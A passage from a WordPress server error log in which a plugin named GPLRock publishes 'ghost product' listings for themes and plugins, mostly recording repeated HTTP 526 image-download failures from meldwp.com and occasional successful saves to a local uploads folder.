attempts. HTTP Code: 526, Error: [06-Apr-2026 06:54:55 UTC] GPLRock: Image download failed for product jina-celebration-agency-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:54:57 UTC] GPLRock: Image download failed for product jina-celebration-agency-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:54:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jina---celebration-agency-theme-19969.webp for product jina-celebration-agency-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:54:59 UTC] GPLRock WARNING: Image download failed for product jina-celebration-agency-theme. URL: https://meldwp.com/wp-content/uploads/jina---celebration-agency-theme-19969.webp [06-Apr-2026 06:54:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jina-celebration-agency-theme [06-Apr-2026 06:54:59 UTC] GPLRock: Image download failed for product newsmax-news-magazine-wordpresss-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:02 UTC] GPLRock: Image download failed for product newsmax-news-magazine-wordpresss-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/newsmax---news--magazine-wordpresss-theme-12457.webp for product newsmax-news-magazine-wordpresss-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:55:04 UTC] GPLRock: Image download failed for product newsmax-news-magazine-wordpresss-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:06 UTC] GPLRock: Image download failed for product newsmax-news-magazine-wordpresss-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/newsmax---news--magazine-wordpresss-theme-12457.webp for product newsmax-news-magazine-wordpresss-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:55:08 UTC] GPLRock WARNING: Image download failed for product newsmax-news-magazine-wordpresss-theme. URL: https://meldwp.com/wp-content/uploads/newsmax---news--magazine-wordpresss-theme-12457.webp [06-Apr-2026 06:55:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: newsmax-news-magazine-wordpresss-theme [06-Apr-2026 06:55:08 UTC] GPLRock: Image download failed for product webster-responsive-multi-purpose-html5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:10 UTC] GPLRock: Image download failed for product webster-responsive-multi-purpose-html5-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/webster---responsive-multi-purpose-html5-template-2144.webp for product webster-responsive-multi-purpose-html5-template after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:55:12 UTC] GPLRock: Image download failed for product webster-responsive-multi-purpose-html5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:15 UTC] GPLRock: Image download failed for product webster-responsive-multi-purpose-html5-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/webster---responsive-multi-purpose-html5-template-2144.webp for product webster-responsive-multi-purpose-html5-template after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:55:17 UTC] GPLRock WARNING: Image download failed for product webster-responsive-multi-purpose-html5-template. URL: https://meldwp.com/wp-content/uploads/webster---responsive-multi-purpose-html5-template-2144.webp [06-Apr-2026 06:55:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: webster-responsive-multi-purpose-html5-template [06-Apr-2026 06:55:17 UTC] GPLRock: Image downloaded successfully for product ogo-creative-multipurpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-89b4633b.webp [06-Apr-2026 06:55:17 UTC] GPLRock: Using pre-downloaded image for product ogo-creative-multipurpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-89b4633b.webp [06-Apr-2026 06:55:17 UTC] GPLRock: Ghost product published with image - Product ID: ogo-creative-multipurpose-wordpress-theme [06-Apr-2026 06:55:17 UTC] GPLRock: Image download failed for product supplero-supplement-store-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:19 UTC] GPLRock: Image download failed for product supplero-supplement-store-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/supplero---supplement-store-woocommerce-theme-314.webp for product supplero-supplement-store-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:55:21 UTC] GPLRock: Image download failed for product supplero-supplement-store-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:23 UTC] GPLRock: Image download failed for product supplero-supplement-store-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/supplero---supplement-store-woocommerce-theme-314.webp for product supplero-supplement-store-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:55:26 UTC] GPLRock WARNING: Image download failed for product supplero-supplement-store-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/supplero---supplement-store-woocommerce-theme-314.webp [06-Apr-2026 06:55:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: supplero-supplement-store-woocommerce-theme [06-Apr-2026 06:55:26 UTC] GPLRock: Image download failed for product swingster-elementor-music-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:28 UTC] GPLRock: Image download failed for product swingster-elementor-music-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/swingster---elementor-music-wordpress-theme-2054.webp for product swingster-elementor-music-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:55:30 UTC] GPLRock: Image download failed for product swingster-elementor-music-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:32 UTC] GPLRock: Image download failed for product swingster-elementor-music-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/swingster---elementor-music-wordpress-theme-2054.webp for product swingster-elementor-music-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:55:34 UTC] GPLRock WARNING: Image download failed for product swingster-elementor-music-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/swingster---elementor-music-wordpress-theme-2054.webp [06-Apr-2026 06:55:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: swingster-elementor-music-wordpress-theme [06-Apr-2026 06:55:34 UTC] GPLRock: Image download failed for product safir-a-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:36 UTC] GPLRock: Image download failed for product safir-a-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/safir---a-wordpress-blog-theme-30763.webp for product safir-a-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:55:39 UTC] GPLRock: Image download failed for product safir-a-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:41 UTC] GPLRock: Image download failed for product safir-a-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/safir---a-wordpress-blog-theme-30763.webp for product safir-a-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:55:43 UTC] GPLRock WARNING: Image download failed for product safir-a-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/safir---a-wordpress-blog-theme-30763.webp [06-Apr-2026 06:55:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: safir-a-wordpress-blog-theme [06-Apr-2026 06:55:43 UTC] GPLRock: Image download failed for product probiz-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:45 UTC] GPLRock: Image download failed for product probiz-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/probiz---portfolio-wordpress-theme-1856.webp for product probiz-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:55:47 UTC] GPLRock: Image download failed for product probiz-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:49 UTC] GPLRock: Image download failed for product probiz-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:55:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/probiz---portfolio-wordpress-theme-1856.webp for product probiz-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:55:51 UTC] GPLRock WARNING: Image download failed for product probiz-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/probiz---portfolio-wordpress-theme-1856.webp [06-Apr-2026 06:55:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: probiz-portfolio-wordpress-theme [06-Apr-2026 07:00:11 UTC] GPLRock: Image downloaded successfully for product legale-lawyer-law-firm-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4f5c2d87.webp [06-Apr-2026 07:00:11 UTC] GPLRock: Using pre-downloaded image for product legale-lawyer-law-firm-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4f5c2d87.webp [06-Apr-2026 07:00:11 UTC] GPLRock: Ghost product published with image - Product ID: legale-lawyer-law-firm-template-kit [06-Apr-2026 07:00:13 UTC] GPLRock: Image downloaded successfully for product learnkit-e-learning-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-91d86715.webp [06-Apr-2026 07:00:13 UTC] GPLRock: Using pre-downloaded image for product learnkit-e-learning-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-91d86715.webp [06-Apr-2026 07:00:13 UTC] GPLRock: Ghost product published with image - Product ID: learnkit-e-learning-elementor-template-kit [06-Apr-2026 07:00:14 UTC] GPLRock: Image downloaded successfully for product lawyere-legal-attorney-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5ed78196.webp [06-Apr-2026 07:00:14 UTC] GPLRock: Using pre-downloaded image for product lawyere-legal-attorney-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5ed78196.webp [06-Apr-2026 07:00:14 UTC] GPLRock: Ghost product published with image - Product ID: lawyere-legal-attorney-elementor-template-kit [06-Apr-2026 07:00:16 UTC] GPLRock: Image downloaded successfully for product lawwkit-legal-practice-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6a14ff14.webp [06-Apr-2026 07:00:16 UTC] GPLRock: Using pre-downloaded image for product lawwkit-legal-practice-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6a14ff14.webp [06-Apr-2026 07:00:16 UTC] GPLRock: Ghost product published with image - Product ID: lawwkit-legal-practice-elementor-template-kit [06-Apr-2026 07:00:17 UTC] GPLRock: Image downloaded successfully for product lawteral-legal-law-firm-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-32e1ee12.webp [06-Apr-2026 07:00:17 UTC] GPLRock: Using pre-downloaded image for product lawteral-legal-law-firm-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-32e1ee12.webp [06-Apr-2026 07:00:17 UTC] GPLRock: Ghost product published with image - Product ID: lawteral-legal-law-firm-elementor-template-kit [06-Apr-2026 07:00:19 UTC] GPLRock: Image downloaded successfully for product lawtarro-attorney-law-firm-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f597d216.webp [06-Apr-2026 07:00:19 UTC] GPLRock: Using pre-downloaded image for product lawtarro-attorney-law-firm-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f597d216.webp [06-Apr-2026 07:00:19 UTC] GPLRock: Ghost product published with image - Product ID: lawtarro-attorney-law-firm-elementor-template-kit [06-Apr-2026 07:00:20 UTC] GPLRock: Image downloaded successfully for product lawride-lawyer-law-firm-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8e20b89b.webp [06-Apr-2026 07:00:20 UTC] GPLRock: Using pre-downloaded image for product lawride-lawyer-law-firm-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8e20b89b.webp [06-Apr-2026 07:00:20 UTC] GPLRock: Ghost product published with image - Product ID: lawride-lawyer-law-firm-elementor-template-kit [06-Apr-2026 07:00:21 UTC] GPLRock: Image downloaded successfully for product lawone-legal-law-firm-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a2354c54.webp [06-Apr-2026 07:00:21 UTC] GPLRock: Using pre-downloaded image for product lawone-legal-law-firm-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a2354c54.webp [06-Apr-2026 07:00:21 UTC] GPLRock: Ghost product published with image - Product ID: lawone-legal-law-firm-elementor-template-kit [06-Apr-2026 07:00:23 UTC] GPLRock: Image downloaded successfully for product lawkey-law-firm-attorney-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-75c155b8.webp [06-Apr-2026 07:00:23 UTC] GPLRock: Using pre-downloaded image for product lawkey-law-firm-attorney-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-75c155b8.webp [06-Apr-2026 07:00:23 UTC] GPLRock: Ghost product published with image - Product ID: lawkey-law-firm-attorney-elementor-template-kit [06-Apr-2026 07:00:24 UTC] GPLRock: Image downloaded successfully for product laautor-author-publisher-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e565a0a0.webp [06-Apr-2026 07:00:24 UTC] GPLRock: Using pre-downloaded image for product laautor-author-publisher-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e565a0a0.webp [06-Apr-2026 07:00:24 UTC] GPLRock: Ghost product published with image - Product ID: laautor-author-publisher-elementor-template-kit [06-Apr-2026 07:01:29 UTC] GPLRock: Image download failed for product woocommerce-product-badges-labels-add-custom-sale-tags-stickers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:01:31 UTC] GPLRock: Image download failed for product woocommerce-product-badges-labels-add-custom-sale-tags-stickers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:01:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-badges--labels--add-custom-sale-tags--stickers-22729.webp for product woocommerce-product-badges-labels-add-custom-sale-tags-stickers after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:01:34 UTC] GPLRock: Image download failed for product woocommerce-product-badges-labels-add-custom-sale-tags-stickers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:01:36 UTC] GPLRock: Image download failed for product woocommerce-product-badges-labels-add-custom-sale-tags-stickers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:01:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-badges--labels--add-custom-sale-tags--stickers-22729.webp for product woocommerce-product-badges-labels-add-custom-sale-tags-stickers after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:01:38 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-badges-labels-add-custom-sale-tags-stickers. URL: https://meldwp.com/wp-content/uploads/woocommerce-product-badges--labels--add-custom-sale-tags--stickers-22729.webp [06-Apr-2026 07:01:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-badges-labels-add-custom-sale-tags-stickers [06-Apr-2026 07:01:38 UTC] GPLRock: Image download failed for product ht-script-pro-insert-headers-and-footers-code (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:01:40 UTC] GPLRock: Image download failed for product ht-script-pro-insert-headers-and-footers-code (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:01:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ht-script-pro---insert-headers-and-footers-code-7384.webp for product ht-script-pro-insert-headers-and-footers-code after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:01:42 UTC] GPLRock: Image download failed for product ht-script-pro-insert-headers-and-footers-code (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:01:44 UTC] GPLRock: Image download failed for product ht-script-pro-insert-headers-and-footers-code (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:01:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ht-script-pro---insert-headers-and-footers-code-7384.webp for product ht-script-pro-insert-headers-and-footers-code after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:01:47 UTC] GPLRock WARNING: Image download failed for product ht-script-pro-insert-headers-and-footers-code. URL: https://meldwp.com/wp-content/uploads/ht-script-pro---insert-headers-and-footers-code-7384.webp [06-Apr-2026 07:01:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ht-script-pro-insert-headers-and-footers-code [06-Apr-2026 07:01:47 UTC] GPLRock: Image download failed for product time-line-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:01:49 UTC] GPLRock: Image download failed for product time-line-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:01:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/time-line-addon-for-wpbakery-page-builder-18851.webp for product time-line-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:01:51 UTC] GPLRock: Image download failed for product time-line-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:01:53 UTC] GPLRock: Image download failed for product time-line-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:01:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/time-line-addon-for-wpbakery-page-builder-18851.webp for product time-line-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:01:55 UTC] GPLRock WARNING: Image download failed for product time-line-addon-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/time-line-addon-for-wpbakery-page-builder-18851.webp [06-Apr-2026 07:01:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: time-line-addon-for-wpbakery-page-builder [06-Apr-2026 07:01:55 UTC] GPLRock: Image downloaded successfully for product grid-fx-ultimate-grid-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-63505cd6.webp [06-Apr-2026 07:01:55 UTC] GPLRock: Using pre-downloaded image for product grid-fx-ultimate-grid-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-63505cd6.webp [06-Apr-2026 07:01:55 UTC] GPLRock: Ghost product published with image - Product ID: grid-fx-ultimate-grid-plugin-for-wordpress [06-Apr-2026 07:01:56 UTC] GPLRock: Image download failed for product quick-user-export-filter (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:01:58 UTC] GPLRock: Image download failed for product quick-user-export-filter (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quick-user-export--filter-10591.webp for product quick-user-export-filter after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:02:00 UTC] GPLRock: Image download failed for product quick-user-export-filter (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:02 UTC] GPLRock: Image download failed for product quick-user-export-filter (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quick-user-export--filter-10591.webp for product quick-user-export-filter after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:02:04 UTC] GPLRock WARNING: Image download failed for product quick-user-export-filter. URL: https://meldwp.com/wp-content/uploads/quick-user-export--filter-10591.webp [06-Apr-2026 07:02:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: quick-user-export-filter [06-Apr-2026 07:02:04 UTC] GPLRock: Image download failed for product single-product-checkout-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:06 UTC] GPLRock: Image download failed for product single-product-checkout-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/single-product-checkout-for-woocommerce-13485.webp for product single-product-checkout-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:02:08 UTC] GPLRock: Image download failed for product single-product-checkout-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:11 UTC] GPLRock: Image download failed for product single-product-checkout-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/single-product-checkout-for-woocommerce-13485.webp for product single-product-checkout-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:02:13 UTC] GPLRock WARNING: Image download failed for product single-product-checkout-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/single-product-checkout-for-woocommerce-13485.webp [06-Apr-2026 07:02:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: single-product-checkout-for-woocommerce [06-Apr-2026 07:02:13 UTC] GPLRock: Image download failed for product advanced-cf7-db-reply-back (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:15 UTC] GPLRock: Image download failed for product advanced-cf7-db-reply-back (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advanced-cf7-db---reply-back-22449.webp for product advanced-cf7-db-reply-back after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:02:17 UTC] GPLRock: Image download failed for product advanced-cf7-db-reply-back (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:19 UTC] GPLRock: Image download failed for product advanced-cf7-db-reply-back (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advanced-cf7-db---reply-back-22449.webp for product advanced-cf7-db-reply-back after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:02:21 UTC] GPLRock WARNING: Image download failed for product advanced-cf7-db-reply-back. URL: https://meldwp.com/wp-content/uploads/advanced-cf7-db---reply-back-22449.webp [06-Apr-2026 07:02:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: advanced-cf7-db-reply-back [06-Apr-2026 07:02:21 UTC] GPLRock: Image download failed for product pricepep-woocommerce-dynamic-pricing-discounts-fees (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:24 UTC] GPLRock: Image download failed for product pricepep-woocommerce-dynamic-pricing-discounts-fees (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pricepep---woocommerce-dynamic-pricing-discounts--fees-1840.webp for product pricepep-woocommerce-dynamic-pricing-discounts-fees after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:02:26 UTC] GPLRock: Image download failed for product pricepep-woocommerce-dynamic-pricing-discounts-fees (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:28 UTC] GPLRock: Image download failed for product pricepep-woocommerce-dynamic-pricing-discounts-fees (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pricepep---woocommerce-dynamic-pricing-discounts--fees-1840.webp for product pricepep-woocommerce-dynamic-pricing-discounts-fees after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:02:30 UTC] GPLRock WARNING: Image download failed for product pricepep-woocommerce-dynamic-pricing-discounts-fees. URL: https://meldwp.com/wp-content/uploads/pricepep---woocommerce-dynamic-pricing-discounts--fees-1840.webp [06-Apr-2026 07:02:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pricepep-woocommerce-dynamic-pricing-discounts-fees [06-Apr-2026 07:02:30 UTC] GPLRock: Image download failed for product 4th-july-rain-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:32 UTC] GPLRock: Image download failed for product 4th-july-rain-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/4th-july-rain---wordpress-plugin-26250.webp for product 4th-july-rain-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:02:34 UTC] GPLRock: Image download failed for product 4th-july-rain-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:37 UTC] GPLRock: Image download failed for product 4th-july-rain-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:02:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/4th-july-rain---wordpress-plugin-26250.webp for product 4th-july-rain-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:02:39 UTC] GPLRock WARNING: Image download failed for product 4th-july-rain-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/4th-july-rain---wordpress-plugin-26250.webp [06-Apr-2026 07:02:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: 4th-july-rain-wordpress-plugin [06-Apr-2026 07:02:39 UTC] GPLRock: Image downloaded successfully for product woocommerce-advance-product-label-and-badge-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6b7fe84b.webp [06-Apr-2026 07:02:39 UTC] GPLRock: Using pre-downloaded image for product woocommerce-advance-product-label-and-badge-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6b7fe84b.webp [06-Apr-2026 07:02:39 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-advance-product-label-and-badge-pro [06-Apr-2026 07:17:30 UTC] GPLRock: Image download failed for product safedia-home-security-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:17:32 UTC] GPLRock: Image download failed for product safedia-home-security-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:17:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/safedia--home-security-wordpress-theme-27250.webp for product safedia-home-security-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:17:34 UTC] GPLRock: Image download failed for product safedia-home-security-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:17:36 UTC] GPLRock: Image download failed for product safedia-home-security-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:17:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/safedia--home-security-wordpress-theme-27250.webp for product safedia-home-security-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:17:38 UTC] GPLRock WARNING: Image download failed for product safedia-home-security-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/safedia--home-security-wordpress-theme-27250.webp [06-Apr-2026 07:17:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: safedia-home-security-wordpress-theme [06-Apr-2026 07:17:38 UTC] GPLRock: Image download failed for 